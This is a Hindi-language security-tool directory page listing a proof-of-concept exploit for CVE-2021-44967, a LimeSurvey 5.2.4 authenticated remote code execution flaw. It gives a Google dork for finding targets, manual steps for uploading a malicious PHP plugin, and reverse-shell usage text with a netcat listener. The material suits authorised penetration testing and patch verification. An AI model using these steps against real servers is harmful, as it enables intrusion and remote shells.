Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44967 — POC exploit for CVE-2021-44967 | Kitploit
उपकरण/GitHubGitHub/d3ext/cve-2021-44967
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubd3ext/cve-2021-44967

CVE-2021-44967

POC exploit for CVE-2021-44967

रिपॉजिटरी देखें
61 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44967

root@kitploit:~
# Exploit Title: LimeSurvey 5.2.4 - Authenticated Remote Code Execution (RCE)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Discovered by: Y1LD1R1M
# Exploit Author: D3Ext
# Vendor Homepage: https://www.limesurvey.org/
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Tested on: Kali Linux 2025
# CVE: CVE-2021-44967

स्पष्टीकरण

लाइमसर्वे 5.2.4 में अपलोड और इंस्टॉल प्लगइन्स फंक्शन के माध्यम से एक रिमोट कोड एक्जीक्यूशन (RCE) कमजोरी मौजूद है, जो एक दूरस्थ दुर्भावनापूर्ण उपयोगकर्ता को मनमाना PHP कोड फ़ाइल अपलोड करने की अनुमति दे सकती है।

इस कमजोरी का मैन्युअल रूप से शोषण करने के लिए निम्नलिखित चरणों का पालन करें:

  1. PHP फ़ाइल और कॉन्फ़िग फ़ाइल वाला एक ZIP बनाएँ
  2. LimeSurvey में लॉगिन करें
  3. कॉन्फ़िगरेशन -> प्लगइन्स -> अपलोड और इंस्टॉल पर जाएँ
  4. अपनी ZIP फ़ाइल अपलोड करें
  5. इसे इंस्टॉल करें
  6. अंत में, अपना प्लगइन सक्रिय करें
  7. फिर आपका PHP कोड /upload/plugins/<plugin_name>/<php_file> के अंतर्गत सुलभ होना चाहिए

उपयोग

root@kitploit:~
usage: CVE-2021-44967.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]

CVE-2021-44967 - LimeSurvey Authenticated RCE

options:
  -h, --help           show this help message and exit
  --url URL            URL of the LimeSurvey web root
  --user USER          username to log in
  --password PASSWORD  password of the username
  --lhost LHOST        local host to receive the reverse shell
  --lport LPORT        local port to receive the reverse shell
  --verbose            enable verbose

नेटकैट लिसनर शुरू करें और फिर इस प्रकार एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>

डेमो

संदर्भ

root@kitploit:~
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत है

कॉपीराइट © 2025, D3Ext

टूल डाउनलोड करें